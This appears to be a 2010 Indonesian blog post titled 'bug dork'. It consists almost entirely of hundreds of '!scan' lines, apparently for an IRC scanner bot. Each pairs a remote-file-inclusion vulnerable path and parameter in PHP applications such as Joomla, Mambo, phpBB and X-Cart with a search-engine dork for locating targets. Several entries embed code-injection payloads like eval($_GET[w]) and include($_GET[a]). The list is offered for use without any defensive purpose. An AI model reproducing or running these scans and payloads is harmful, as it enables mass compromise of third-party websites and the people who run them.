!scan /include/scripts/export_batch.inc.php?DIR= "/ModernBill" "/ModernBill"



!scan calogic/clmcpreload.php?CLPATH= "/calogic"



!scan /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= kboard



!scan cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP= cowadmin



!scan /adminhead.php?path[docroot]= "/adminhead.php"

!scan /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site= "phpkit"



!scan ?custompluginfile[]= index.php?categoryid=5



!scan ?custompluginfile[]= index.php?categoryid=10



!scan ?custompluginfile[]= index.php?categoryid=15



!scan index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22



!scan /tiny_includes/config.php?dir_ws= "/tiny_includes"



!scan /index.php?file_op= "RPortal"



!scan /common/theme/default/header_setup.php?path[docroot]= "Events Calendar"


scan cmpro_header.inc.php?sitepath= "cmpro.ext"


!scan errors.php?error= "Miro International Pty Ltd."


!scan ?REX[INCLUDE_PATH]= "redaxo"


!scan /?view=page&pagename= /?view=selectcity&targetview=1


!scan /coast/header.php?sections_file= "/coast"


!scan errors.php?error= "/barcodegen"


!scan /class/LSTable.php?class_dir= "/barcodegen"


!scan /mwchat/libs/errors.php?error= "/mwchat"



!scan /modules/mods_full/shopping_cart/includes/errors.php?error= "/shopping_cart"


!scan /modules/My_eGallery/errors.php?error= "/My_eGallery"


!scan /tools/errors.php?error= "includes/php-dbi.php"


!scan /includes/mailaccess/errors.php?error= "/mailaccess"


!scan /include/monitoring/engine/errors.php?error= "MakeXML4statusCounter"


!scan /ecommerce/payment/errors.php?error= "/ecommerce"



!scan /mambots/content/multithumb/errors.php?error= "/content/multithumb"


!scan /frame.php?framefile= "/frame.php"


!scan /frame.php?framefile= "Ol Bookmarks Manager"


!scan errors.php?error= "/extcalendar" "/extcalendar"



!scan includes/session.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"


!scan errors.php?error= "/com_philaform" "/com_philaform"


!scan /_theme/breadcrumb.php?rootBase= "! Hide Your Friends & Comments"


!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "CMS Contenido"


!scan include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site= "Diese Webseite wurde mit PHPKIT Version 1.6.1 erstellt"


!scan index.php?ac= "index.php?ac="



!scan index.php?mod= "index.php?mod="



!scan /includes/function_core.php?web_root= "This search engine is in no way intended for illegal downloads."


!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= "/skin_shop"


!scan contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]= cms/front_content


!scan /modules/Forums/admin/admin_users.php?phpbb_root_path= "%22PHP-Nuke+Port+by+Tom+Nitzschner%22"


!scan /page.php?id= "/page.php?id="


!scan /modules/Forums/admin/errors.php?error= "modules.php?name="


!scan /poll/poll_ssi.php?include_path= "poll_ssi.php"


!scan /include/html/config.php?DIR= "/modernbill"

Sabtu, 27 Maret 2010

bug dork

Posted by zens 00:58, under | 1 comment

!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= "BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More."
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /?installed_config_file= "PhpJobScheduler"
!scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
!scan errors.php?error= "/com_rwcards" "/com_rwcards"
!scan //vwar/backup/errors.php?error= "errors.php"
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= "powered by CMS Made Simple version"
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= "netcat require"
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= "php?option=com_rwcards" "php?option=com_rwcards"
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums"
!scan phphtml.php?htmlclass_path= "phphtml.php"
!scan lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= "/adodb_lite" "/adodb_lite"
!scan /?path%5Bdocroot%5D= "/newspublish" "/newspublish"
!scan /?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22
!scan errors.php?error= "netcat_files"
!scan /index.php?DOCUMENT_ROOT= "netcat_files"
!scan errors.php?error= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan /?prefix= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan ?sIncPath= "powered by boonex"
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= "powered by boonex"
!scan errors.php?error= "powered by boonex"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "powered by boonex"
!scan errors.php?error= "/ray.3.5" "/ray.3.5"
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= "/com_ponygallery"
!scan /?page= /?pagedb=?
!scan hw3.php?daysonly=0).include($_GET[file]).(0&file= "Current Conditions" "Sun & Moon Information"
!scan /?page= "ArticleBeach"
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]= "Powered by Orca Interactive Forum Script"
!scan errors.php?error= "Powered by Orca Interactive Forum Script"
!scan /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= "/sohoadmin/"
!scan /?include_path= "guestbook"
!scan /?include_path= "action"+"poll_ident"
!scan /admin/include/lib.module.php?mod_root= "/cmsworks"
!scan errors.php?error= "/com_extcalendar"
!scan /admin/templates/template_thumbnail.php?thumb_template= "Powered by HomePH Design"
!scan /includes/header.php?c_temp_path= "/header.php"
!scan /include/admin.lib.inc.php?site_path= "include/lib.inc.php"
!scan src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT= "/resource/categories"
!scan errors.php?error= "phpkit" "phpkit"
!scan errors.php?error= "/contenido/includes"
!scan popup.php?path= "phpkit" "phpkit"
!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "/contenido/includes"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "/plugins/jrBrowser/"
!scan /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= /weather/hw3.php/
!scan /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= "com_pollxt"
!scan /ktmllite/includes/ktedit/toolbar.php?dirDepth= "ktmllite" "ktmllite"
!scan errors.php?error= "Subdreamer"
!scan //?custompluginfile%5B%5D= Created by Subdreamer CMS
!scan lostpasswd.php?env[include_prefix]= bookmark4u
!scan /poll/png.php?include_path= "action"+"poll_ident"
!scan /inc/formmail.inc.php?script_root= "Powered By Form Mail Script"
!scan /phpAdsNew/view.inc.php?phpAds_path= "Copyright 2000-2002, PHPAUCTION.ORG"
!scan /authentication/errors.php?error= "phpbb3"
!scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= /phpbb3/
!scan errors.php?error= "phpRaider"
!scan /poll/booth.php?include_path= "action"+"poll_ident"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Anet"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aorg"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aus"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aru"
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= 12%22If+you+are+a+registered+member%2C+please+login.+If+you+are+not+registered+yet%2C+please+signup.%22
!scan /admin.php?include_path= "Total Records:" "HTML code is" "guestbook"
!scan /guestbook1//admin.php?include_path= "guestbook1"
!scan poll/booth.php?include_path= "Advanced Poll"
!scan index.php?url= index.php?url=
!scan /galeria.php?start=0&kategoria= /galeria.php?start=0&kategoria=
!scan home.php?index= "home.php?index="
!scan head.php?adresa= head.php?
!scan /poll/png.php?include_path= extcalendar
!scan /includes/db_adodb.php?baseDir= "dotProject logo"
!scan index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid= allinurl: aid "com_xfaq"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" "chat_exemple.php"
!scan includes/stats.inc.php?prefix= browse.php%3Fid%3D site:com
!scan components/com_sitemap/sitemap.php?mosConfig_admin_path= /component/option,com_sitemap/
!scan /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_= "Powered by Mambo"
!scan includes/useragent.inc.php?prefix= "/browse.php?id="
!scan docs/front-end-demo/cart2.php?workdir= %22hosting.php?pt=r%22 site:au
!scan /include/lib.inc.php?site_path= "lib.inc.php"
!scan /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]= "Joomla Component mosDirectory"
!scan /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path= "/includes/joomla.php"
!scan /guestbook/errors.php?error= "Guestbook - Administration"
!scan /index.php?page= index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"
!scan errors.php?error= "powered by TalkBack"
!scan /components/errors.php?error= "com_simpleboard"
!scan /modules/errors.php?error= "/includes/mambo.php"
!scan /errors.php?error= "Joomla Visites"
!scan /modules/Forums/admin/errors.php?error= com_gallery
!scan /include/bbs.lib.inc.php?site_path= "/rgboard/"
!scan /ch_readalso.php?read_xml_include= "Copyrights © 2005 Belgische Federale Overheidsdiensten"
!scan /txt-db-api/txt-db-api.php?API_HOME_DIR= "powered by Crafty Syntax Live Help 2.7"
!scan /dotproject//includes/db_connect.php?baseDir= "dotproject"
!scan modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE= modules/dungeon
!scan /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path= "com_letterman"
!scan /index.php?config=1&base_datapath= wmview.php
!scan errors.php?error= "index"+"of/"+"errors.php"
!scan /accounts/inc/include.php?language=0&lang_settings[0][1]= "powered by Icewarp"
!scan /include/write.php?dir= "/write.php?dir="
!scan /errors.php?error= /errors.php?error=
!scan /components/com_flyspray/startdown.php?file= "/com_flyspray"
!scan /modules/xfsection/modify.php?dir_module= "xfsection" "xfsection"
!scan /common/db.php?commonpath= "samPHPweb" "samPHPweb"
!scan errors.php?error= "samPHPweb" "samPHPweb"
!scan config.inc.php?path_escape= "XZero Community Classifieds" "XZero Community Classifieds"
!scan inc/TabStrip.php?function= "includeTab" "includeTab"
!scan /config.inc.php?path_escape= "Classifieds for our community"
!scan errors.php?error= "Classifieds for our community"
!scan /admin/spaw/spaw_control.class.php?spaw_root= "xt_conteudo" "xt_conteudo"
!scan errors.php?error= "/appserv"
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a= "index.php?name=PNphpBB2"
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "index.php?name=PNphpBB2"
!scan /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight= "index.php?name=PNphpBB2"
!scan /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "com_comprofiler" "com_comprofiler"
!scan /includes/mailaccess/pop3.php?CONFIG[pear_dir]= "mailaccess"
!scan /includes/functions_portal.php?phpbb_root_path= "phpbb" "phpbb"
!scan /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "MakeXML4statusCounter.php" "MakeXML4statusCounter.php"
!scan /inc/cmses/aedatingCMS.php?dir%5Binc%5D= "cmses" "cmses"
!scan /import_export/pages/index.inc.php?REX[INCLUDE_PATH]= "Redaxo 2.7.4" "Redaxo 2.7.4"
!scan /faqsupport/samplefaqsupport.php?path[docroot]= "OneAdmin" "OneAdmin"
!scan /ecommerce/payment/cybersource.php?path[docroot]= "ecommerce"
!scan /doceboCms/class/class.dashboard_cms.php?where_framework= "doceboCms" "doceboCms"
!scan /config/dbutil.bck.php?confdir= "/config/dbutil.bck.php"
!scan /config.inc.php?config%5broot_dir%5d= "CLASSIFIEDS"
!scan /claroline/tracking/userLog.php?rootSys= /claroline/ /claroline/
!scan /claroline/phpbb/page_tail.php?includePath= /claroline/ /claroline/
!scan /citywriter/head.php?path= /citywriter/
!scan /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D= /bookmark4u/ /bookmark4u/
!scan /atom.php5?page= "atom.php5?page="
!scan /ashnews.php?pathtoashnews= "pathtoashnews"
!scan /newspublish/include.php?path%5Bdocroot%5D= "newspublish"
!scan /agendax/addevent.inc.php?agendax_path= /agendax/
!scan /PHP_CON/Exchange/include.php?webappcfg[APPPATH]= "PHP-CON v1.3" "PHP-CON v1.3"
!scan /Neos_Chronos/header.php?base_folder= /Neos_Chronos/ /Neos_Chronos/
!scan /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path= "com_chronocontact" "com_chronocontact"
!scan /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= /mwchat/ /mwchat/
!scan /%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]= "Cecommerce" "Cecommerce"
!scan /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path= /excelwriter/ /excelwriter/
!scan /inc/download_center_lite.inc.php?script_root= "Download Center Lite"
!scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
!scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
!scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
!scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
!scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
!scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
!scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
!scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
!scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
!scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
!scan /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path= "com_magazine"
!scan /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path= "com_lurm_constructor"
!scan /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path= "com_loudmounth"
!scan /index.php?option=com_log&Itemid=&mosConfig_absolute_path= "com_log"
!scan /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path= "com_lmo"
!scan /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path= "com_linkdirectory"
!scan /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path= "com_kochsuite"
!scan /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path= "com_jreactions"
!scan /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path= "com_loudmounth"
!scan /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path= "com_dbquery"
!scan /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path= "com_datsogallery"
!scan /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path= "com_bayesiannaivefilter"
!scan /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= /xoopsgallery/ /xoopsgallery/
!scan /skin/zero_vote/error.php?dir= "zeroboard"
!scan /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" "/mambots/content/"
!scan /drupal/?_menu[callbacks][1][callback]= "drupal"
!scan /config.inc.php?path_escape= "Powered by SNETWORKS PHP CLASSIFIEDS"
!scan /?mosConfig_absolute_path= "Joomla" "Joomla"
!scan /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= "index.php?autoLoadConfig"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" net "zeroboard" uk
!scan classes/core/language.php?rootdir= "LimeSurvey"
!scan classes/core/language.php?rootdir= "You have not provided a survey identification number"
!scan PHPDJ_v05/dj/djpage.php?page= allintext:"PHPDJ was created by www.php-mania.co.uk"
!scan /inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan index.php?redir= inurl:"index.php?redir="
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= intitle:PHPOpenChat ext:php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" inurl:index.php
!scan inc/cmses/aedatingCMS.php?dir[inc]= allinurl:"cmses"
!scan phphtml.php?htmlclass_path= phphtml.php
!scan /phpsecurityadmin/include/logout.php?PSA_PATH= "PHPSecurityAdmin"
!scan components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab
!scan /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= "Advanced Poll"
!scan active/components/xmlrpc/client.php?c[components]= "Pindorama"
!scan apps/apps.php?app= WebDesktop
!scan nuseo/admin/nuseo_admin_d.php?nuseo_dir= "NuSEO PHP"
!scan drupal/?_menu[callbacks][1][callback]= Drupal
!scan tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= TikiWiki
!scan administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= com_jcs
!scan administrator/components/com_jcs/view/register.php?mosConfig_absolute_path= com_jcs
!scan components/com_mp3_allopass/allopass.php?mosConfig_live_site= com_mp3_allopass
!scan scan administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path= "com_jcs"
!scan /modules/coppermine/themes/default/theme.php?THEME_DIR= ""Powered by Coppermine"
!scan /default.php?page=home inurl:"/default.php?page=home"
!scan /default.php?page= inurl:"/default.php?page=home"
!scan /PhpLinkExchange/bits_listings.php?svr_rootPhpStart= inurl:PhpLinkExchange
!scan /openi-admin/base/fileloader.php?config[openi_dir]= Powered by OPENi-CMS
!scan /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
!scan /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
!scan index.php?root_path= "powered by Open Bulletin Board"
!scan config.php?fpath= "Powered By PUMA"
!scan /index.php?classified_path= "Vivvo Article Manager"
!scan index.php?base= powered by MyABraCaDaWeb
!scan pop.php?base= powered by MyABraCaDaWeb
!scan extras/ext_cats.php?dir_path= photokorn 1.52
!scan content/article.php?ide= inurl:WM-News
!scan content/modify_go.php?pwfile= inurl:WM-News
!scan protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
!scan /inc/header.php/step_one.php?server_inc= step_one.php?sid
!scan /language/lang_english/lang_main_album.php?phpbb_root_path= "Powered by phpBB2" site:fr
!scan language/lang_english/lang_main_album.php?phpbb_admin_path= phpBB
!scan phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan lib/base.php?BaseCfg[BaseDir]= actSite
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan /includes/openid/Auth/OpenID/BBStore.php?openid_root_path= "phpBB"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mx_glance"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mxBB"
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= "amember"
!scan news/newstopic_inc.php?indir= "Public Media Manager"
!scan phfito/phfito-post?SRC_PATH= "phpFidoNode"
!scan /protection.php?action=logout&siteurl= "/members.php?id=all"
!scan /appserv/main.php?appserv_root= "The AppServ Open Project"
!scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
!scan admin/include/header.php?repertoire= "chupix cms"
!scan forum/forum.php?view= "lustig.cms"
!scan access/login.php?path_to_root= "FrontAccounting"
!scan includes/lang/language.php?path_to_root= "FrontAccounting"
!scan dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth= "DFD Cart"
!scan show.php?file= "Helplink"
!scan data/compatible.php?module_name= "Nuke Mobile Entartainment"
!scan config.inc.php?_path= "WordSmith"
!scan modules/search/search.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/submit_links.php?rootdp=zZz&gsLanguage= "iziContents"
!scan modifyform.html?code= modifyform
!scan Encoder.php?base_dir= phpsyncml
!scan Decoder.php?base_dir= phpsyncml
!scan administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= "com_joom12pic"
!scan phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan afb-3-beta-2007-08-28/_includes/settings.inc.php?approot= "Ajax File Browser"
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= inurl:"com_joomlaradiov5"
!scan config.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan smarty.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan customer/product.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan provider/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan admin/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan NuclearBB/tasks/send_queued_emails.php?root_path= NuclearBB
!scan protection.php?action=logout&siteurl= "Site Layout & Graphics"
!scan protection.php?action=logout&siteurl= statcounter
!scan protection.php?action=logout&siteurl= "PHPFanBase"
!scan manager/admin/index.php?MGR= "phpRealty"
!scan manager/admin/p_ins.php?MGR= "phpRealty"
!scan manager/admin/u_ins.php?MGR= "phpRealty"
!scan source/mod/rss/viewitem.php?Codebase= ED Engine
!scan source/mod/rss/view.php?Codebase= ED Engine
!scan source/mod/rss/post.php?Codebase= ED Engine
!scan source/mod/rss/channeledit.php?Codebase= WebEd
!scan joomla/index.php?option=com_restaurante&task= "/index.php?option=com_restaurante"
!scan modules/addons/plugin.php?doc_root= "txx cms"
!scan modules/addons/plugin.php?doc_root= inurl:addons
!scan modules/Discipline/CategoryBreakdownTime.php?FocusPath= inurl:Discipline
!scan modules/Discipline/CategoryBreakdownTime.php?staticpath= inurl:Discipline
!scan modules/Discipline/StudentFieldBreakdown.php?staticpath= inurl:Discipline
!scan lib/functions.php?DOC_ROOT= "Online Fantasy Football League"
!scan lib/header.php?DOC_ROOT= "Online Fantasy Football League"
!scan menu.php?functions_file= phpMytourney
!scan environment.php?DIR_PREFIX= AnyInventory
!scan dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH= Phpof
!scan stphpapplication.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan senetman/html/index.php?page= eNetman
!scan es_desp.php?files_dir= Weblogicnet
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan es_offer.php?files_dir= Weblogicnet
!scan stphpbtnimage.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpform.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpapplication.php?STPHPLIB_DIR= "stph"
!scan stphpbtnimage.php?STPHPLIB_DIR= "stph"
!scan stphpform.php?STPHPLIB_DIR= "stph"
!scan senetman/html/index.php?page= "senetman"
!scan /intern/admin/other/backup.php?admin=1&rootdir= "phpBG"
!scan /intern/admin/?rootdir= "phpBG"
!scan /intern/clan/member_add.php?rootdir= "phpBG"
!scan /intern/config/key_2.php?rootdir= "phpBG"
!scan /intern/config/forum.php?rootdir= "phpBG"
!scan xGB.php?act=admin&do= allinurl:"xGb.php"
!scan modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= "mvcw_conver.php"
!scan convert/mvcw.php?vwar_root= "convert/mvcw.php"
!scan convert/mvcw.php?step=1&vwar_root= "convert/mvcw.php"
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= inurl:activecontent.php
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= "Php Blue Dragon"
!scan ncaster/admin/addons/archive/archive.php?adminfolder= inurl:ncaster
!scan ncaster/admin/addons/archive/archive.php?adminfolder= Ncaster 1.7.2
!scan /chat/inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:.ru
!scan database.php?mosConfig_absolute_path= "powered by mambo"
!scan config.php?path_to_root= inurl:"path_to_root"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan admin/inc/change_action.php?format_menue= "PHPNews Version 0.93"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan /include.php?path[docroot]= inurl:"newspublish"
!scan newsletter/newsletter.php?waroot= inurl:newsletter.php?
!scan mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= inurl:mediagallery/
!scan beacon/language/1/splash.lang.php?languagePath= inurl:/beacon/
!scan common/func.php?CommonAbsDir= inurl: func.php?
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:"index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= allinurl:"mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.org
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom"
!scan /main.php?sayfa= inurl:"main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
